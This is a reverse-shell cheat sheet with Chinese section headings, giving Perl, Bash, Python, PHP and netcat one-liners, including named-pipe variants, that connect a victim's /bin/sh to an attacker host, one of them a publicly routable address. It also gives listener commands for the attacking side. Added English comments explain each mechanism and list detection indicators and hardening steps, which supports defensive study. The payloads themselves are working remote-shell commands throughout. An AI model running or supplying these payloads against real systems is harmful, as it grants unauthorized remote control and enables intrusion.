Perl版

# Perl (Socket module): creates a TCP socket and connects to $i:$p (192.168.211.1:7777 here).
# Only when connect() succeeds are STDIN, STDOUT and STDERR re-opened onto the socket S;
# exec then replaces the perl process with "/bin/sh -i", so the shell's I/O is the connection.
# Detection: a `perl -e` command line that turns into /bin/sh -i, and an interactive shell
# whose fds 0/1/2 are all the same TCP socket (/proc/<pid>/fd, lsof). Default-deny egress
# filtering on servers stops the outbound connection.
perl -e 'use Socket;$i="192.168.211.1";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# Perl with -MIO: forks, and the parent exits immediately (exit,if($p)), so the child keeps
# running after the invoking command has returned. The child opens an IO::Socket::INET
# connection to 192.168.211.1:7777, attaches STDIN to it for reading, and attaches the handle
# named by $~ for writing (presumably STDOUT, the default value of $~; confirm).
# It then reads the socket line by line and hands each line to system().
# Detection: no "/bin/sh -i" appears here. Look instead for a long-lived perl process whose
# parent has exited, holding an outbound TCP socket and spawning short-lived child commands.
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.211.1:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Bash版

# Bash network redirection: a redirection to /dev/tcp/HOST/PORT is handled by bash itself,
# which opens a TCP connection; it is not a real file. Here &> sends stdout and stderr of
# `sh -i` to 192.168.211.1:7777, and 0>&1 makes stdin the same connection.
# Detection: the literal string "/dev/tcp/" in process arguments, shell history or execve
# audit records is a high-signal indicator; also a shell with a socket on fds 0/1/2.
# Mitigation: outbound egress filtering; bash can be built without net redirections.
bash -c 'sh -i &>/dev/tcp/192.168.211.1/7777 0>&1'
# Same /dev/tcp mechanism, run by an interactive bash (-i) directly: >& redirects stdout and
# stderr to the TCP connection to 192.168.211.1:7777, and 0>&1 points stdin at it as well.
# The redirection is bash-specific, so the line has to be run by bash itself.
# Detection: "bash -i" together with "/dev/tcp/" in a command line or audit log; an
# interactive bash with no controlling terminal and a socket on fds 0/1/2.
bash -i >& /dev/tcp/192.168.211.1/7777 0>&1

Python版

# Python: opens a TCP socket to 120.27.32.227:7777, duplicates the socket's descriptor onto
# fds 0, 1 and 2 with os.dup2, then runs /bin/sh -i via subprocess.call so the child shell
# inherits the socket as stdin/stdout/stderr.
# NOTE(review): every other snippet on this page targets 192.168.211.1 (private range); this
# one uses a publicly routable address, presumably a leftover. Confirm before reusing in a lab.
# Detection: `python -c` with "socket" and "dup2" in the arguments; a python process whose
# child is /bin/sh -i with a socket on fds 0/1/2; unexpected outbound connections.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("120.27.32.227",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP版

# PHP: fsockopen() connects to 10.1.1.19:8080, then exec() starts /bin/sh -i with stdin,
# stdout and stderr redirected to file descriptor 3. The line never uses $sock again; it
# assumes the new socket is descriptor 3, which the code does not check.
# Detection: php (CLI, php-fpm or a web-server worker) spawning /bin/sh; "fsockopen" together
# with "exec" in a `php -r` argument or in an uploaded file.
# Hardening: list exec and similar process functions in php.ini disable_functions where the
# application does not need them, and restrict outbound connections from web hosts.
php -r '$sock=fsockopen("10.1.1.19",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

nc版

正向连接

服务器端: nc -l -p 7777 -e /bin/bash

攻击机: nc 192.168.211.231 7777

反向连接

服务器端:nc -e /bin/sh 192.168.211.1 7777

攻击机端: nc -lvvp 7777

nc 不支持 -e 选项时

需要root权限

服务器端:
# Removes any old /tmp/backpipe and recreates it as a named pipe (mknod ... p). /bin/sh then
# reads its stdin from the pipe; the shell's stdout is piped into nc, and whatever nc receives
# from 192.168.211.1:7777 is written back into the pipe, closing the loop.
# NOTE(review): creating a FIFO with `mknod NAME p` does not normally require root on Linux;
# confirm the "需要root权限" heading above.
# Forensics: the FIFO stays at the fixed path /tmp/backpipe until someone deletes it. Look for
# FIFOs in /tmp (find /tmp -type p) and for an sh and an nc process holding the same pipe open.
root@p0desta:~# rm /tmp/backpipe;mknod /tmp/backpipe p
root@p0desta:~# /bin/sh 0</tmp/backpipe | nc 192.168.211.1 7777 1>/tmp/backpipe

攻击机端:
nc -lvvp 7777

不需要root权限

# Same named-pipe loop, with the FIFO created by mkfifo instead of mknod: /bin/sh reads stdin
# from /tmp/backpipe, its stdout goes to nc, and nc's received data (from 192.168.211.1:7777)
# is written back into the pipe.
# Forensics: a FIFO at a fixed path under /tmp plus an sh/nc pair sharing it; the nc process
# shows an established outbound connection in ss/netstat output.
root@p0desta:~# rm /tmp/backpipe;mkfifo /tmp/backpipe
root@p0desta:~# /bin/sh 0</tmp/backpipe | nc 192.168.211.1 7777 1>/tmp/backpipe
# Single-line form of the named-pipe loop: recreate the FIFO /tmp/f, then `cat /tmp/f` feeds
# an interactive /bin/sh (stderr merged into stdout with 2>&1), whose output is piped to nc;
# data nc receives from 192.168.211.1:7777 is redirected back into /tmp/f.
# Detection: the process chain cat -> sh -i -> nc sharing one FIFO under /tmp; "mkfifo" and
# "nc" on the same command line in audit logs; the leftover FIFO /tmp/f on disk.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.211.1 7777  >/tmp/f